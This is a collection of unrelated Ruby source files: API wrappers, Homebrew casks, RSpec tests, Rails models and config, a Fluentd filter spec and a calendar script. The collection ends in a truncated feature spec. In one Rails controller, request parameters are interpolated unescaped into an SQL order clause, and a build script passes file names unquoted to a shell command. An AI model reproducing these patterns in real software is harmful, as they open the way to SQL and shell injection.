# frozen_string_literal: true module ZohoHub class Response def initialize(params) @params = params || {} end def invalid_data? error_code?('INVALID_DATA') end def invalid_token? error_code?('INVALID_TOKEN') end def internal_error? error_code?('INTERNAL_ERROR') end def invalid_request? error_code?('INVALID_REQUEST') end def authentication_failure? error_code?('AUTHENTICATION_FAILURE') end def invalid_module? error_code?('INVALID_MODULE') end def no_permission? error_code?('NO_PERMISSION') end def mandatory_not_found? error_code?('MANDATORY_NOT_FOUND') end def record_in_blueprint? error_code?('RECORD_IN_BLUEPRINT') end def too_many_requests? error_code?('TOO_MANY_REQUESTS') end def record_not_in_process? error_code?('RECORD_NOT_IN_PROCESS') end def record_not_found? error_code?('RESOURCE_NOT_FOUND') end def empty? @params.empty? end def data data = @params[:data] if @params.dig(:data) data || @params end def msg first_data = data.is_a?(Array) ? data.first : data msg = first_data[:message] if first_data.dig(:details, :expected_data_type) expected = first_data.dig(:details, :expected_data_type) field = first_data.dig(:details, :api_name) parent_api_name = first_data.dig(:details, :parent_api_name) msg << ", expected #{expected} for '#{field}'" msg << " in #{parent_api_name}" if parent_api_name end msg end # Error response examples: # {"data":[{"code":"INVALID_DATA","details":{},"message":"the id given...","status":"error"}]} # {:code=>"INVALID_TOKEN", :details=>{}, :message=>"invalid oauth token", :status=>"error"} def error_code?(code) if data.is_a?(Array) return false if data.size > 1 return data.first[:code] == code end data[:code] == code end end end
# frozen_string_literal: true module QA module Page module Project module Job class Show < QA::Page::Base include Component::CiBadgeLink view 'app/assets/javascripts/jobs/components/log/log.vue' do element :job_log_content end view 'app/assets/javascripts/jobs/components/stages_dropdown.vue' do element :pipeline_path end view 'app/assets/javascripts/jobs/components/sidebar.vue' do element :retry_button end def successful?(timeout: 60) raise "Timed out waiting for the build trace to load" unless loaded? raise "Timed out waiting for the status to be a valid completed state" unless completed?(timeout: timeout) job_log = find_element(:job_log_content).text QA::Runtime::Logger.debug(" \n\n ------- Job log: ------- \n\n #{job_log} \n -------") passed? end # Reminder: You may wish to wait for a particular job status before checking output def output(wait: 5) result = '' wait_until(reload: false, max_duration: wait, sleep_interval: 1) do result = find_element(:job_log_content).text result.include?('Job') end result end def retry! click_element :retry_button end private def loaded?(wait: 60) wait_until(reload: true, max_duration: wait, sleep_interval: 1) do has_element?(:job_log_content, wait: 1) end end end end end end end
#!/usr/bin/env ruby # frozen_string_literal: true TEMPLATE = <<~MAIN_TEMPLATE load( "{workspace_name}//ruby:defs.bzl", "rb_library", ) package(default_visibility = ["//visibility:public"]) rb_library( name = "bundler_setup", srcs = ["lib/bundler/setup.rb"], visibility = ["//visibility:private"], ) rb_library( name = "bundler", srcs = glob( include = [ "bundler/**/*", ], ), rubyopt = ["{bundler_setup}"], ) # PULL EACH GEM INDIVIDUALLY MAIN_TEMPLATE GEM_TEMPLATE = <<~GEM_TEMPLATE rb_library( name = "{name}", srcs = glob( include = [ "lib/ruby/{ruby_version}/gems/{name}-{version}*/**", "lib/ruby/{ruby_version}/specifications/{name}-{version}*.gemspec", "lib/ruby/{ruby_version}/cache/{name}-{version}*.gem", "bin/*" ], exclude = {exclude}, ), deps = {deps}, includes = ["lib/ruby/{ruby_version}/gems/{name}-{version}*/lib"], rubyopt = ["{bundler_setup}"], ) GEM_TEMPLATE ALL_GEMS = <<~ALL_GEMS rb_library( name = "gems", srcs = glob( {gems_lib_files}, ), includes = {gems_lib_paths}, rubyopt = ["{bundler_setup}"], ) ALL_GEMS GEM_LIB_PATH = lambda do |ruby_version, gem_name, gem_version| "lib/ruby/#{ruby_version}/gems/#{gem_name}-#{gem_version}*/lib" end require 'bundler' require 'json' require 'stringio' require 'fileutils' require 'tempfile' class BundleBuildFileGenerator attr_reader :workspace_name, :repo_name, :build_file, :gemfile_lock, :excludes, :ruby_version def initialize(workspace_name:, repo_name:, build_file: 'BUILD.bazel', gemfile_lock: 'Gemfile.lock', excludes: nil) @workspace_name = workspace_name @repo_name = repo_name @build_file = build_file @gemfile_lock = gemfile_lock @excludes = excludes # This attribute returns 0 as the third minor version number, which happens to be # what Ruby uses in the PATH to gems, eg. ruby 2.6.5 would have a folder called # ruby/2.6.0/gems for all minor versions of 2.6.* @ruby_version ||= (RUBY_VERSION.split('.')[0..1] << 0).join('.') end def generate! # when we append to a string many times, using StringIO is more efficient. template_out = StringIO.new # In Bazel we want to use __FILE__ because __dir__points to the actual sources, and we are # using symlinks here. # # rubocop:disable Style/ExpandPathArguments bin_folder = File.expand_path('../bin', __FILE__) binaries = Dir.glob("#{bin_folder}/*").map do |binary| 'bin/' + File.basename(binary) if File.executable?(binary) end # rubocop:enable Style/ExpandPathArguments template_out.puts TEMPLATE .gsub('{workspace_name}', workspace_name) .gsub('{repo_name}', repo_name) .gsub('{ruby_version}', ruby_version) .gsub('{binaries}', binaries.to_s) .gsub('{bundler_setup}', bundler_setup_require) # strip bundler version so we can process this file remove_bundler_version! # Append to the end specific gem libraries and dependencies bundle = Bundler::LockfileParser.new(Bundler.read_file(gemfile_lock)) gem_lib_paths = [] bundle.specs.each { |spec| register_gem(spec, template_out, gem_lib_paths) } template_out.puts ALL_GEMS .gsub('{gems_lib_files}', gem_lib_paths.map { |p| "#{p}/**/*.rb" }.to_s) .gsub('{gems_lib_paths}', gem_lib_paths.to_s) .gsub('{bundler_setup}', bundler_setup_require) ::File.open(build_file, 'w') { |f| f.puts template_out.string } end private def bundler_setup_require @bundler_setup_require ||= "-r#{runfiles_path('lib/bundler/setup.rb')}" end def runfiles_path(path) "${RUNFILES_DIR}/#{repo_name}/#{path}" end # This method scans the contents of the Gemfile.lock and if it finds BUNDLED WITH # it strips that line + the line below it, so that any version of bundler would work. def remove_bundler_version! contents = File.read(gemfile_lock) return unless contents =~ /BUNDLED WITH/ temp_gemfile_lock = "#{gemfile_lock}.no-bundle-version" system %(sed -n '/BUNDLED WITH/q;p' "#{gemfile_lock}" > #{temp_gemfile_lock}) if File.symlink?(gemfile_lock) ::FileUtils.rm_f(gemfile_lock) # it's just a symlink end ::FileUtils.move(temp_gemfile_lock, gemfile_lock, force: true) end def register_gem(spec, template_out, gem_lib_paths) gem_lib_paths << GEM_LIB_PATH[ruby_version, spec.name, spec.version] deps = spec.dependencies.map { |d| ":#{d.name}" } deps += [':bundler_setup'] exclude_array = excludes[spec.name] || [] # We want to exclude files and folder with spaces in them exclude_array += ['**/* *.*', '**/* */*'] template_out.puts GEM_TEMPLATE .gsub('{exclude}', exclude_array.to_s) .gsub('{name}', spec.name) .gsub('{version}', spec.version.to_s) .gsub('{deps}', deps.to_s) .gsub('{repo_name}', repo_name) .gsub('{ruby_version}', ruby_version) .gsub('{bundler_setup}', bundler_setup_require) end end # ruby ./create_bundle_build_file.rb "BUILD.bazel" "Gemfile.lock" "repo_name" "[]" "wsp_name" if $PROGRAM_NAME == __FILE__ if ARGV.length != 5 warn("USAGE: #{$PROGRAM_NAME} BUILD.bazel Gemfile.lock repo-name [excludes-json] workspace-name") exit(1) end build_file, gemfile_lock, repo_name, excludes, workspace_name, * = *ARGV BundleBuildFileGenerator.new(build_file: build_file, gemfile_lock: gemfile_lock, repo_name: repo_name, excludes: JSON.parse(excludes), workspace_name: workspace_name) .generate! end
# frozen_string_literal: true class ValidationsReflex < ApplicationReflex end
module FormHelpers def submit_form find('input[type="submit"]').click end end
# # Description: This method sets the retirement_state to retiring # module ManageIQ module Automate module Cloud module VM module Retirement module StateMachines module Methods class StartRetirement def initialize(handle = $evm) @handle = handle end def main log_info @vm = @handle.root['vm'] vm_validation start_retirement end private def log_info @handle.log("info", "Listing Root Object Attributes:") @handle.root.attributes.sort.each { |k, v| @handle.log("info", "\t#{k}: #{v}") } @handle.log("info", "===========================================") end def vm_validation if @vm.nil? raise 'VM Object not found' end if @vm.retired? raise 'VM is already retired' end if @vm.retiring? raise 'VM is already in the process of being retired' end end def start_retirement @handle.log('info', "VM before start_retirement: #{@vm.inspect} ") @handle.create_notification(:type => :vm_retiring, :subject => @vm) @vm.start_retirement @handle.log('info', "VM after start_retirement: #{@vm.inspect} ") end end end end end end end end end ManageIQ::Automate::Cloud::VM::Retirement::StateMachines::Methods::StartRetirement.new.main
cask 'vlc' do version '2.2.8' sha256 '4406e025c566c5703ab11e53070d3e399680ddfb8994b60cb753079dffd2a027' url "https://get.videolan.org/vlc/#{version}/macosx/vlc-#{version}.dmg" appcast 'http://update.videolan.org/vlc/sparkle/vlc-intel64.xml', checkpoint: '2e8debe5851a85536ff4ef24cff5bbff2cbce7c17bc3902eeccbbf1636c4dc67' name 'VLC media player' homepage 'https://www.videolan.org/vlc/' gpg "#{url}.asc", key_id: '65f7c6b4206bd057a7eb73787180713be58d1adc' auto_updates true app 'VLC.app' # shim script (https://github.com/caskroom/homebrew-cask/issues/18809) shimscript = "#{staged_path}/vlc.wrapper.sh" binary shimscript, target: 'vlc' preflight do IO.write shimscript, <<~EOS #!/bin/sh '#{appdir}/VLC.app/Contents/MacOS/VLC' "$@" EOS end zap trash: [ '~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/org.videolan.vlc.sfl*', '~/Library/Application Support/org.videolan.vlc', '~/Library/Application Support/VLC', '~/Library/Preferences/org.videolan.vlc', '~/Library/Preferences/org.videolan.vlc.plist', '~/Library/Saved Application State/org.videolan.vlc.savedState', '~/Library/Caches/org.videolan.vlc', ] end
require "spec_helper" require "shared/configured" describe MetricFu::Configuration, "for templates" do it_behaves_like "configured" do describe "when there is no CC_BUILD_ARTIFACTS environment variable" do before(:each) do ENV["CC_BUILD_ARTIFACTS"] = nil get_new_config end it "should set @template_directory to the lib/templates relative " + "to @metric_fu_root_directory" do expected_template_dir = MetricFu.root.join("lib", "templates").to_s expect(template_directory).to eq(expected_template_dir) end it "should set @template_class to MetricFu::Templates::MetricsTemplate by default" do expect(template_class).to eq(MetricFu::Templates::MetricsTemplate) end describe "when a templates configuration is given" do before do class DummyTemplate; end @config.templates_configuration do |config| config.template_class = DummyTemplate config.link_prefix = "http:/" config.syntax_highlighting = false config.darwin_txmt_protocol_no_thanks = false end end it "should set given template_class" do expect(template_class).to eq(DummyTemplate) end it "should set given link_prefix" do expect(MetricFu::Formatter::Templates.option("link_prefix")).to eq("http:/") end it "should set given darwin_txmt_protocol_no_thanks" do expect(MetricFu::Formatter::Templates.option("darwin_txmt_protocol_no_thanks")).to be_falsey end it "should set given syntax_highlighting" do expect(MetricFu::Formatter::Templates.option("syntax_highlighting")).to be_falsey end end end end end
# coding: utf-8 lib = File.expand_path('../lib', __FILE__) $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) require 'tdameritrade/version' Gem::Specification.new do |spec| spec.name = "tdameritrade-api-ruby" spec.version = TDAmeritrade::VERSION spec.authors = ["Winston Kotzan"] spec.email = ["[email protected]"] spec.summary = %q{This is a simple gem for connecting to the TD Ameritrade Developers OAuth API} spec.description = "This is a gem for connecting to the OAuth/JSON-based TD Ameritrade Developers API released " \ "in 2018. Go to https://developer.tdameritrade.com/ for the official documentation and to " \ "create your OAuth application." spec.homepage = "https://github.com/wakproductions/tdameritrade-api-ruby" spec.license = "MIT" spec.files = [`git ls-files`.split($/)] + Dir["lib/**/*"] spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) } spec.test_files = spec.files.grep(%r{^(test|spec|features)/}) spec.require_paths = ["lib"] spec.add_dependency "bundler", "~> 1.5" spec.add_dependency "rake" spec.add_dependency "hashie" spec.add_dependency "httparty", "~> 0.13" spec.add_dependency "activesupport", "~> 4.0" spec.add_dependency "nokogiri", "~> 1.6" spec.add_development_dependency "clipboard" spec.add_development_dependency "httplog" spec.add_development_dependency "rspec", ">= 3.2" spec.add_development_dependency "pry" spec.add_development_dependency "webmock" end
require 'rest-client' response = RestClient.get 'https://careapi.coronasafe.in/api/v1/state/' states = JSON.parse(response)['results'] states.each { |state| State.create!(name: state['name']) }
# frozen_string_literal: true require 'active_support/core_ext/class' require 'active_support/core_ext/module/delegation' module ERBLint class Reporter def self.create_reporter(format, *args) reporter_klass = "#{ERBLint::Reporters}::#{format.to_s.camelize}Reporter".constantize reporter_klass.new(*args) end def self.available_format?(format) available_formats.include?(format.to_s) end def self.available_formats descendants .map(&:to_s) .map(&:demodulize) .map(&:underscore) .map { |klass_name| klass_name.sub("_reporter", "") } .sort end def initialize(stats, autocorrect) @stats = stats @autocorrect = autocorrect end def preview; end def show; end private attr_reader :stats, :autocorrect delegate :processed_files, to: :stats end end
require 'date' WEEKS, DAYS = 6, 7 # 读入假日数据文件 @holiday = IO.readlines("q62-holiday.txt").map{|h| h.split('/').map(&:to_i) } # 读入调休工作日数据文件 @extra_workday = IO.readlines("q62-extra-workday.txt").map{|h| h.split('/').map(&:to_i) } # 计算符合条件的最大长方形的面积 def max_rectangle(cal) rect = 0 WEEKS.times{|sr| # 起始行 DAYS.times{|sc| # 起始列 sr.upto(WEEKS){|er| # 终点行 sc.upto(DAYS){|ec| # 终点列 is_weekday = true # 起始点和终点之间有没有工作日以外的日子 sr.upto(er){|r| sc.upto(ec){|c| is_weekday = false if cal[c + r * DAYS] == 0 } } if is_weekday then rect = [rect, (er - sr + 1) * (ec - sc + 1)].max end } } } } rect end # 指定年份月份,获取最大长方形面积 def calc(y, m) cal = Array.new(WEEKS * DAYS, 0) first = wday = Date.new(y, m, 1).wday # 获取该月1日的星期 Date.new(y, m, -1).day.times{|d| # 循环处理直到该月结束 if (1 <= wday && wday <= 5 && [email protected]?([y, m, d + 1])) || @extra_workday.include?([y, m, d + 1]) cal[first + d] = 1 end wday = (wday + 1) % DAYS } max_rectangle(cal) end yyyymm = [*2006..2015].product([*1..12]) puts yyyymm.map{|y ,m| calc(y, m)}.inject(:+)
class OnyxMountainlion < Cask url 'http://joel.barriere.pagesperso-orange.fr/dl/108/OnyX.dmg' homepage 'http://www.titanium.free.fr/downloadonyx.php' version '2.7.4' sha256 'e025125b06fc78322347f8549871c67e570131af83e8bb18b62ed43b65d7369d' link 'OnyX.app' end
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require "functions_framework" # Create an http function that uses return FunctionsFramework.http "return_http" do |request| return "I received a GET request: #{request.url}" if request.request_method == "GET" "I received a #{request.request_method} request." end
require 'formula' class Libresample < Formula homepage 'https://ccrma.stanford.edu/~jos/resample/Available_Software.html' url 'http://ftp.de.debian.org/debian/pool/main/libr/libresample/libresample_0.1.3.orig.tar.gz' sha1 '85339a6114627e27010856f42a3948a545ca72de' def install system "./configure", "--disable-debug", "--disable-dependency-tracking", "--prefix=#{prefix}" system "make" lib.install 'libresample.a' include.install 'include/libresample.h' end end
# frozen_string_literal: true require_relative '../../helper' require 'fluent/plugin/filter_throttle' SingleCov.covered! describe Fluent::Plugin::ThrottleFilter do include Fluent::Test::Helpers before do Fluent::Test.setup end after do if instance_variable_defined?(:@driver) assert @driver.error_events.empty?, "Errors detected: " + @driver.error_events.map(&:inspect).join("\n") end end def create_driver(conf='') @driver = Fluent::Test::Driver::Filter.new(Fluent::Plugin::ThrottleFilter).configure(conf) end describe '#configure' do it 'raises on invalid group_bucket_limit' do assert_raises { create_driver("group_bucket_limit 0") } end it 'raises on invalid group_bucket_period_s' do assert_raises { create_driver("group_bucket_period_s 0") } end it 'raises on invalid group_reset_rate_s' do assert_raises { create_driver("group_bucket_limit 10\ngroup_bucket_period_s 10\ngroup_reset_rate_s 2") } end it 'raises on invalid group_reset_rate_s' do assert_raises { create_driver("group_bucket_limit 10\ngroup_bucket_period_s 10\ngroup_reset_rate_s -2") } end it 'raises on invalid group_warning_delay_s' do assert_raises { create_driver("group_warning_delay_s 0") } end end describe '#filter' do it 'throttles per group key' do driver = create_driver <<~CONF group_key "group" group_bucket_period_s 1 group_bucket_limit 5 CONF driver.run(default_tag: "test") do driver.feed([[event_time, {"msg": "test", "group": "a"}]] * 10) driver.feed([[event_time, {"msg": "test", "group": "b"}]] * 10) end groups = driver.filtered_records.group_by { |r| r[:group] } assert_equal(5, groups["a"].size) assert_equal(5, groups["b"].size) end it 'allows composite group keys' do driver = create_driver <<~CONF group_key "group1,group2" group_bucket_period_s 1 group_bucket_limit 5 CONF driver.run(default_tag: "test") do driver.feed([[event_time, {"msg": "test", "group1": "a", "group2": "b"}]] * 10) driver.feed([[event_time, {"msg": "test", "group1": "b", "group2": "b"}]] * 10) driver.feed([[event_time, {"msg": "test", "group1": "c"}]] * 10) driver.feed([[event_time, {"msg": "test", "group2": "c"}]] * 10) end groups = driver.filtered_records.group_by { |r| r[:group1] } groups.each { |k, g| groups[k] = g.group_by { |r| r[:group2] } } assert_equal(5, groups["a"]["b"].size) assert_equal(5, groups["b"]["b"].size) assert_equal(5, groups["c"][nil].size) assert_equal(5, groups[nil]["c"].size) end it 'drops until rate drops below group_reset_rate_s' do driver = create_driver <<~CONF group_bucket_period_s 60 group_bucket_limit 180 group_reset_rate_s 2 CONF logs_per_sec = [4, 4, 2, 1, 2] driver.run(default_tag: "test") do (0...logs_per_sec.size*60).each do |i| Time.stubs(now: Time.at(i)) min = i / 60 driver.feed([[event_time, min: min]] * logs_per_sec[min]) end end groups = driver.filtered_records.group_by { |r| r[:min] } messages_per_minute = [] (0...logs_per_sec.size).each do |min| messages_per_minute[min] = groups.fetch(min, []).size end assert_equal [ 180, # hits the limit in the first minute 0, # still >= group_reset_rate_s 0, # still >= group_reset_rate_s 59, # now < group_reset_rate_s, stop dropping logs (except the first log is dropped) 120 # > group_reset_rate_s is okay now because haven't hit the limit ], messages_per_minute end it 'does not throttle when in log only mode' do driver = create_driver <<~CONF group_bucket_period_s 2 group_bucket_limit 4 group_reset_rate_s 2 group_drop_logs false CONF records_expected = 0 driver.run(default_tag: "test") do (0...10).each do |i| Time.stubs(now: Time.at(i)) count = [1,8 - i].max records_expected += count driver.feed((0...count).map { |j| [event_time, msg: "test#{i}-#{j}"] }) # * count) end end assert_equal records_expected, driver.filtered_records.size assert driver.logs.any? { |log| log.include?('rate exceeded') } assert driver.logs.any? { |log| log.include?('rate back down') } end end describe 'logging' do it 'logs when rate exceeded once per group_warning_delay_s' do driver = create_driver <<~CONF group_bucket_period_s 2 group_bucket_limit 2 group_warning_delay_s 3 CONF logs_per_sec = 4 driver.run(default_tag: "test") do (0...10).each do |i| Time.stubs(now: Time.at(i)) driver.feed([[event_time, msg: "test"]] * logs_per_sec) end end assert_equal 4, driver.logs.select { |log| log.include?('rate exceeded') }.size end it 'logs when rate drops below group_reset_rate_s' do driver = create_driver <<~CONF group_bucket_period_s 2 group_bucket_limit 4 group_reset_rate_s 2 CONF driver.run(default_tag: "test") do (0...10).each do |i| Time.stubs(now: Time.at(i)) driver.feed([[event_time, msg: "test"]] * [1,8 - i].max) end end assert driver.logs.any? { |log| log.include?('rate back down') } end end end
class HomeController < ApplicationController def index end def menu @sections = Section.all if params[:section_id].present? @current_section = Section.find(params[:section_id]) @items = @current_section.food_items else @items = FoodItem.all end if params[:search] @items = FoodItem.search(params[:search]) end if params[:sort_column] @items = @items.order("#{params[:sort_column]} #{params[:sort_type]}") end end def contact_us end end
cask :v1 => 'nocturne' do version '2.0.0' sha256 '062ae6b4619ab518650b2f502aaeb7a864bf69e45ce08dec8b5a3f34a027a347' url "https://blacktree-nocturne.googlecode.com/files/Nocturne.#{version}.zip" name 'Nocturne' homepage 'http://code.google.com/p/blacktree-nocturne/' license :oss app 'Nocturne.app' end
require "find" version = ARGV.shift def insert_url_after_html_tag(html, url) comment = "<!-- Online page at #{url} -->" html.gsub(/(<html[^>]*>)/i){ $1 + comment } end Dir.chdir("html/#{version}") { Find.find(".") {|file| next unless File.extname(file) == ".html" path = file[1..-1] # remove first . path.gsub!(/-([a-z])/){ $1.upcase } # -a -> A url = "http://docs.ruby-lang.org/ja/#{version}#{path}" print "." File.write(file, insert_url_after_html_tag(File.read(file), url)) } }
# encoding: utf-8 require 'spec_helper' describe "Unacknowledged messages" do # # Environment # include EventedSpec::AMQPSpec default_timeout 5 amqp_before do @connection1 = AMQP.connect @connection2 = AMQP.connect @connection3 = AMQP.connect @channel1 = AMQP::Channel.new(@connection1) @channel2 = AMQP::Channel.new(@connection2) @channel3 = AMQP::Channel.new(@connection3) [@channel1, @channel2, @channel3].each { |ch| ch.on_error { fail } } @channel1.prefetch(3) @channel2.prefetch(1) end after(:all) do AMQP.cleanup_state done end # # Examples # # this is a spec example based on one of the Working With Queues doc guides. # It is somewhat hairy since it imitates 3 apps in a single process # but demonstrates redeliveries pretty well. MK. it "are redelivered to alternate consumers when the 'primary' one disconnects" do number_of_messages_app2_received = 0 expected_number_of_deliveries = 21 redelivery_values = Array.new exchange = @channel3.direct("amq.direct") queue1 = @channel1.queue("amqpgem.examples.acknowledgements.explicit", :auto_delete => false) # purge the queue so that we don't get any redeliveries from previous runs queue1.purge queue1.bind(exchange).subscribe(:ack => true) do |metadata, payload| # acknowledge some messages, they will be removed from the queue if metadata.headers["i"] < 10 @channel1.acknowledge(metadata.delivery_tag, false) else # some messages are not ack-ed and will remain in the queue for redelivery # when app #1 connection is closed (either properly or due to a crash) end end queue2 = @channel2.queue!("amqpgem.examples.acknowledgements.explicit", :auto_delete => false) queue2.subscribe(:ack => true) do |metadata, payload| redelivery_values << metadata.redelivered? # app 2 always acks messages metadata.ack number_of_messages_app2_received += 1 end EventMachine.add_timer(2.0) { # app1 quits/crashes @connection1.close } # 0.5 seconds later, publish a bunch of messages EventMachine.add_timer(0.5) { 30.times do |i| exchange.publish("Message ##{i}", :headers => { :i => i }) i += 1 end } done(4.8) { number_of_messages_app2_received.should be >= expected_number_of_deliveries # 3 last messages are redeliveries redelivery_values.last(7).should == [false, false, false, false, true, true, true] } end end
#-- copyright # OpenProject is a project management system. # Copyright (C) 2012-2017 the OpenProject Foundation (OPF) # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License version 3. # # OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows: # Copyright (C) 2006-2017 Jean-Philippe Lang # Copyright (C) 2010-2013 the ChiliProject Team # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # See doc/COPYRIGHT.rdoc for more details. #++ require 'spec_helper' describe 'Multi-value custom fields creation', type: :feature, js: true do let(:admin) { FactoryGirl.create(:admin) } def drag_and_drop(handle, to) scroll_to_element(handle) page .driver .browser .action .move_to(handle.native) .click_and_hold(handle.native) .perform scroll_to_element(to) page .driver .browser .action .move_to(to.native) .release .perform end before do login_as(admin) visit custom_fields_path end it 'can create and reorder custom field list values' do # Create CF click_on 'Create a new custom field' fill_in 'custom_field_name', with: 'My List CF' select 'List', from: 'custom_field_field_format' expect(page).to have_selector('input#custom_field_custom_options_attributes_0_value') fill_in 'custom_field_custom_options_attributes_0_value', with: 'A' # Add new row find('#add-custom-option').click expect(page).to have_selector('input#custom_field_custom_options_attributes_1_value') fill_in 'custom_field_custom_options_attributes_1_value', with: 'B' # Add new row find('#add-custom-option').click expect(page).to have_selector('input#custom_field_custom_options_attributes_2_value') fill_in 'custom_field_custom_options_attributes_2_value', with: 'C' click_on 'Save' # Edit again page.find('a', text: 'My List CF').click expect(page).to have_selector('input#custom_field_custom_options_attributes_0_value[value=A]') expect(page).to have_selector('input#custom_field_custom_options_attributes_1_value[value=B]') expect(page).to have_selector('input#custom_field_custom_options_attributes_2_value[value=C]') # Expect correct values cf = CustomField.last expect(cf.name).to eq('My List CF') expect(cf.possible_values.map(&:value)).to eq %w(A B C) # Drag and drop # We need to hack a target for where to drag the row to page.execute_script <<-JS jQuery('#custom-field-dragula-container') .append('<tr class="__drag_and_drop_end_of_list"><td colspan="4" style="height: 100px"></td></tr>'); JS rows = page.all('tr.custom-option-row') expect(rows.length).to eq(3) drag_and_drop rows[0].find('.dragula-handle'), page.find('.__drag_and_drop_end_of_list') sleep 1 page.execute_script <<-JS jQuery('.__drag_and_drop_end_of_list').remove() JS click_on 'Save' # Edit again expect(page).to have_selector('input#custom_field_custom_options_attributes_0_value[value=B]') expect(page).to have_selector('input#custom_field_custom_options_attributes_1_value[value=C]') expect(page).to have_selector('input#custom_field_custom_options_attributes_2_value[value=A]') cf.reload expect(cf.name).to eq('My List CF') expect(cf.possible_values.map(&:value)).to eq %w(B C A) end end
module Effective class Region < ActiveRecord::Base include RegionOverride self.table_name = EffectiveRegions.regions_table_name.to_s belongs_to :regionable, :polymorphic => true # structure do # title :string # content :text # snippets :text # timestamps # end serialize :snippets, HashWithIndifferentAccess scope :global, -> { where("#{EffectiveRegions.regions_table_name}.regionable_type IS NULL").where("#{EffectiveRegions.regions_table_name}.regionable_id IS NULL") } scope :with_snippets, -> { where("#{EffectiveRegions.regions_table_name}.snippets ILIKE ?", '%snippet_%') } validates_presence_of :title def snippets self[:snippets] || HashWithIndifferentAccess.new() end # Hash of the Snippets objectified # # Returns a Hash of {'snippet_1' => CurrentUserInfo.new(snippets[:key]['options'])} def snippet_objects(locals = {}) locals = {} unless locals.kind_of?(Hash) @snippet_objects ||= snippets.map do |key, snippet| # Key here is 'snippet_1' if snippet['class_name'] klass = "Effective::Snippets::#{snippet['class_name'].classify}".safe_constantize klass.new(snippet.merge!(locals).merge!(:region => self, :id => key)) if klass end end.compact end def global? regionable_id == nil && regionable_type == nil end end end
class CreateAppointment < ActiveRecord::Migration[7.0] def change create_table :appointments do |t| t.string :location t.date :dateOfAppointment t.integer :user_id t.integer :doctor_id t.timestamps end end end
class Profile < ApplicationRecord attr_accessor :height_unit, :weight_unit belongs_to :user validates :height, :starting_weight, :name, :age, presence: true end
# frozen_string_literal: true namespace :db do namespace :seed do Dir[Rails.root.join('db', 'seeds', '*.rb')].each do |filename| task_name = File.basename(filename, '.rb') desc 'Seed ' + task_name + ', based on the file with the same name in `db/seeds/*.rb`' task task_name.to_sym => :environment do load(filename) if File.exist?(filename) end end end end
# frozen_string_literal: true Rails.application.configure do # In the development environment your application's code is reloaded on # every request. This slows down response time but is perfect for development # since you don't have to restart the web server when you make code changes. config.cache_classes = false # Do not eager load code on boot. config.eager_load = false # Show full error reports. config.consider_all_requests_local = true # Enable/disable caching. By default caching is disabled. if Rails.root.join('tmp', 'caching-dev.txt').exist? config.action_controller.perform_caching = true config.cache_store = :memory_store config.public_file_server.headers = { 'Cache-Control' => 'public, max-age=172800' } else config.action_controller.perform_caching = false config.cache_store = :null_store end # Don't care if the mailer can't send. config.action_mailer.raise_delivery_errors = false config.action_mailer.perform_caching = false # Print deprecation notices to the Rails logger. config.active_support.deprecation = :log # Raise an error on page load if there are pending migrations. config.active_record.migration_error = :page_load # Debug mode disables concatenation and preprocessing of assets. # This option may cause significant delays in view rendering with a large # number of complex assets. config.assets.debug = true # Suppress logger output for asset requests. config.assets.quiet = true config.active_storage.service = :local # Raises error for missing translations # config.action_view.raise_on_missing_translations = true # Use an evented file watcher to asynchronously detect changes in source code, # routes, locales, etc. This feature depends on the listen gem. # config.file_watcher = ActiveSupport::EventedFileUpdateChecker end
module Papapi require_relative 'response' class GridResponse < Response include Enumerable def attributes parsed['rows'].first end def count parsed['count'] end def rows parsed['rows'].slice(1, parsed['rows'].count-1) end def [] (key) if rows[key.to_i] return Hash[*attributes.zip(rows[key.to_i]).flatten] end end def each rows.each do |row| yield Hash[*attributes.zip(row).flatten] end end def to_a rows end end end
require 'rails_helper' RSpec.describe 'Candidate can carry over unsuccessful application to a new recruitment cycle' do include CycleTimetableHelper around do |example| Timecop.freeze(mid_cycle) do example.run end end scenario 'when an unsuccessful candidate returns in the next recruitment cycle they can re-apply by carrying over their original application' do given_i_am_signed_in and_i_have_an_application_with_a_rejection when_the_current_recruitment_cycle_ends and_i_visit_my_application_complete_page then_i_cannot_apply_again when_the_next_recruitment_cycle_begins and_i_visit_my_application_complete_page and_i_click_on_apply_again and_i_click_on_start_now and_i_click_go_to_my_application_form then_i_can_see_application_details and_i_can_see_that_no_courses_are_selected when_i_visit_the_carry_over_page_again then_i_am_redirected_to_my_existing_application end def given_i_am_signed_in @candidate = create(:candidate) login_as(@candidate) end def and_i_have_an_application_with_a_rejection @application_form = create(:completed_application_form, :with_completed_references, candidate: @candidate) create(:application_choice, :with_rejection, application_form: @application_form) end def when_the_current_recruitment_cycle_ends Timecop.safe_mode = false Timecop.travel(after_apply_2_deadline) ensure Timecop.safe_mode = true end def then_i_cannot_apply_again expect(page).not_to have_link 'Do you want to apply again?' end def when_the_next_recruitment_cycle_begins Timecop.safe_mode = false Timecop.travel(after_apply_reopens) ensure Timecop.safe_mode = true end def and_i_visit_my_application_complete_page logout login_as(@candidate) visit candidate_interface_application_complete_path end def and_i_click_on_apply_again expect(page).to have_content 'Do you want to continue applying?' click_link 'Continue your application' end def and_i_click_on_start_now expect(page).to have_content "Carry on with your application for courses starting in the #{RecruitmentCycle.cycle_name(RecruitmentCycle.next_year)} academic year." expect(page).to have_content 'Your courses have been removed. You can add them again now.' click_button 'Apply again' end def and_i_click_go_to_my_application_form click_link 'Go to your application form' end def then_i_can_see_application_details expect(page).to have_content('Personal information Completed') click_link 'Personal information' expect(page).to 